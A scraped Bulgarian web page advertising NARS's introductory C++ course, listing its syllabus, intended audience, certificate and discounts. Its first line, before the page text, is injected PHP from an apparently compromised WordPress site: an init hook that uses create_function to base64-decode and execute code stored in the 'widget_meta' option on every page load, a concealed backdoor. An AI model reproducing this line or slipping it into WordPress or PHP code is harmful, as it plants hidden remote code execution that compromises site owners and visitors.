add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Въведение в програмирането със С++ - НАРС

Въведение в програмирането със С++

Какво включва?
Целта на обучението е да представи на студентите основите на програмирането на C++. Учебната програма съдържа: типове данни, променливи, оператори, изрази, цикли, масиви, методи, работа с указатели, низове, основни структури от данни, вход /изход и основи на обектно ориентираното програмиране.

За кого е предназначен?
Обучението е подходящо за всички, които нямат опит в областта на програмирането; за такива, които имат начални познания и имат желание да ги систематизират, развият и усъвършенстват.
Предварителни умения по програмиране не са необходими. Необходими са познания по английски език, добра компютърна грамотност, логическо мислене, желание и амбиция за развитие.

Какво получава всеки курсист?
Всички курсисти, преминали обучението „Въведение в програмирането със С++”, получават документ за участието си.

Заедно с това всеки участник получава още отстъпка при записване в други курсове на НАРС.

Изпитите се провеждат по желание на студентите в съответния курс, поради което не са включени в програмата на обучението.

Изтеглете програмата за курса.

Вижте цените и графика за провеждане на курсовете.

Изтеглете брошура с информация за всички курсове.

За повече информация може да се свържете с нас.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad